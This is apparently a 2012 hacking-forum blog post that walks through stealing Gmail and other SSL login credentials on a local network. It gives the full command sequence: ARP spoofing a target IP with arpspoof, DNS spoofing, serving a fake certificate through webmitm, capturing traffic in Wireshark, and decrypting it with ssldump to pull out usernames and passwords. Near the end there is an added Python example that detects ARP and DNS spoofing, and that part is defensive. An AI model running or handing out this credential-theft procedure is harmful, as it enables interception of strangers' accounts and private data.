Monday, April 23, 2012

Hacking SSL-Based Mail Server Passwords Using a MITM Attack on BackTrack 5

Introduction

Hello HF members. Today I will show you how to hack Gmail credentials, or the credentials of any other SSL (Secure Sockets Layer) site, on a network using a MITM (man-in-the-middle) attack with BackTrack 5.

Definitions & Tools:

1.) SSL :
Quote: Secure Sockets Layer, a computing protocol that ensures the security of data sent via the Internet by using encryption. With SSL, client and server computers exchange public keys, allowing them to encode and decode their communication. So any attacker who tries to sniff traffic between them will only get encrypted garbage values. The web servers which use SSL are denoted by HTTPS.

2.) ARP :
Quote: Address Resolution Protocol is a network layer protocol used to convert an IP address into a physical address such as an Ethernet address (MAC address). A host wishing to obtain a physical address broadcasts an ARP request onto the TCP/IP network. The host on the network that has the IP address in the request then replies with its physical hardware address.

3.) DNS :
Quote: Domain Name System is a database system that translates a domain name into an IP address. For example, if you type gmail.com in your browser, your DNS will reply with Gmail's IP so that your router can connect to Gmail's server using its IP. For a better understanding, type "nslookup" in your cmd or konsole and then type "gmail.com"; you will see your DNS reply with Gmail's IP addresses.

4.) ARP Spoofing :
Quote: ARP spoofing is a technique in which a host in a LAN can "poison" the ARP table of another host by forging fake ARP requests and replies, causing it to send packets to the wrong destination. The attacker can modify the traffic in the network in such a way that it will redirect all traffic to go through it. ARP spoofing will allow an attacker to sniff data frames.

5.) DNS Spoofing :
Quote: DNS spoofing is similar to ARP spoofing; it is based on the presentation of false or fake DNS information to the slave in response to their DNS request, and as a result forcing them to visit a site which is not the real one.

6.) MITM :
Quote: Man in the middle attack means intercepting a communication between two systems; both ARP spoofing and DNS spoofing are types of MITM attack.

7.) IP forwarding :
Quote: IP forwarding enables one host to sit on two LANs and to act as a gateway forwarding IP packets from one LAN to another.


Tools:

1.) fragrouter - tool used for IP forwarding between the slave and its destination host.

2.) arpspoof - to ARP spoof the slave machine and its host.

3.) dnsspoof - to DNS spoof the slave machine and its host.

4.) webmitm - a tool which transparently proxies and sniffs HTTP / HTTPS traffic redirected by dnsspoof, capturing most "secure" SSL-encrypted webmail logins and form submissions.

5.) wireshark - a network protocol analyzer. Here it is used to capture SSL-encrypted traffic between the slave and webmitm.

6.) ssldump - decrypts SSL packets using the private key.

Happily, all these tools are installed in BackTrack 5.


Hacking Gmail Passwords Using a MITM Attack on BackTrack 5

First we need to set up IP forwarding using fragrouter. Open a shell and type the command:
 
Code:

#fragrouter -B1



This forwards packets between the slave and its gateway while spoofing. Minimize the shell.

Now we need to ARP spoof the slave. Open a new shell and type the command:
 
Code:

#arpspoof -t [target ip] [default gateway ip]

Example:

Code:

#arpspoof -t 192.168.1.7 192.168.1.1


Then minimize the shell. We have now begun to ARP spoof the slave.

Then, for DNS spoofing, open a new shell and type:
Code:
 
#dnsspoof

Then minimize the shell. Now all the DNS requests from the slave will be redirected to us.
To provide a proxy for these DNS requests, we have to start up webmitm. Open a new shell and type:
Code:
 
#webmitm -d
 
If you are starting webmitm for the first time, it will ask you for some details to create a fake SSL certificate and private key. Just fill something in. Once you have filled in everything, it will say "webmitm relaying transparently".

It's done; minimize the shell.

We need to capture the traffic using Wireshark:
 
Code:
 
applications ->backtrack -> information gathering ->network analysis ->network traffic analysis ->wireshark

In Wireshark select:
 
Code:
 
capture -> interfaces -> start (click the start button near eth0)


That's it.

Since DNS has been spoofed, an nslookup for Gmail on the slave computer shows the attacker's IP.

In our case the slave opens "gmail.com" in the browser. He will be redirected to webmitm, which will serve the "Gmail page" with the fake SSL certificate; then our slave will log into "Gmail" using his credentials. All the traffic will now be captured by Wireshark.
Then just stop Wireshark and save the captured traffic to the root folder. For example, I will save it as "test".


In the root folder there will be another file called "webmitm.crt". It is the fake SSL certificate generated by webmitm.
Now we have the captured SSL packets and our own fake SSL certificate.

Now, to decrypt the captured packets, open another new shell and type:
 
Code:
 
#ssldump -r test -k webmitm.crt -d > finaloutput


where:

test -->captured packets
webmitm.crt --> SSL certificate
finaloutput --> decrypted output file

Now open a shell and type:
 
Code:
# cat finaloutput | grep Email

It will show you the decrypted username and password.
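
From the defender's side, the ARP and DNS spoofing steps above leave observable traces: the gateway's IP starts mapping to another host's MAC address, and a public name such as gmail.com resolves to a LAN address. The following Python code is an added example, not part of the original post; the MAC addresses, the 192.168.1.9 host, the `.lan`/`.local` suffixes and the function names are constructed for illustration.

```python
import ipaddress
from collections import defaultdict

# Constructed sample data (not from the original post): two neighbour-table
# snapshots as (ip, mac) pairs and resolver answers as (name, ip) pairs.
ARP_BEFORE = [("192.168.1.1", "00:11:22:33:44:55"),
              ("192.168.1.7", "66:77:88:99:aa:bb"),
              ("192.168.1.9", "de:ad:be:ef:00:01")]
ARP_AFTER = [("192.168.1.1", "de:ad:be:ef:00:01"),  # gateway now has .9's MAC
             ("192.168.1.7", "66:77:88:99:aa:bb"),
             ("192.168.1.9", "de:ad:be:ef:00:01")]
DNS_ANSWERS = [("gmail.com", "192.168.1.9"), ("example.org", "93.184.216.34")]


def arp_alerts(before, after, gateway_ip):
    """Flag IP->MAC changes and any MAC claimed by more than one IP."""
    alerts = []
    known = {ip: mac.lower() for ip, mac in before}
    owners = defaultdict(set)
    for ip, mac in after:
        mac = mac.lower()
        owners[mac].add(ip)
        old = known.get(ip)
        if old is not None and old != mac:
            kind = "GATEWAY_MAC_CHANGED" if ip == gateway_ip else "MAC_CHANGED"
            alerts.append((kind, ip, old, mac))
    for mac, ips in sorted(owners.items()):
        if len(ips) > 1:
            alerts.append(("DUPLICATE_MAC", mac, tuple(sorted(ips))))
    return alerts


def dns_alerts(answers, internal_suffixes=(".lan", ".local")):
    """Flag public names that resolve to a private or loopback address."""
    alerts = []
    for name, ip in answers:
        addr = ipaddress.ip_address(ip)
        is_internal_name = name.lower().endswith(internal_suffixes)
        if not is_internal_name and (addr.is_private or addr.is_loopback):
            alerts.append(("PUBLIC_NAME_PRIVATE_IP", name, ip))
    return alerts


if __name__ == "__main__":
    for alert in arp_alerts(ARP_BEFORE, ARP_AFTER, "192.168.1.1") + dns_alerts(DNS_ANSWERS):
        print(alert)
```

On a live host the snapshots would come from the operating system's neighbour table and resolver logs; a static ARP entry for the gateway makes the first alert unnecessary on that host.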

Credits Black Hat :Offensive security


Please let me know if there are any mistakes.

Any feedback is welcome.
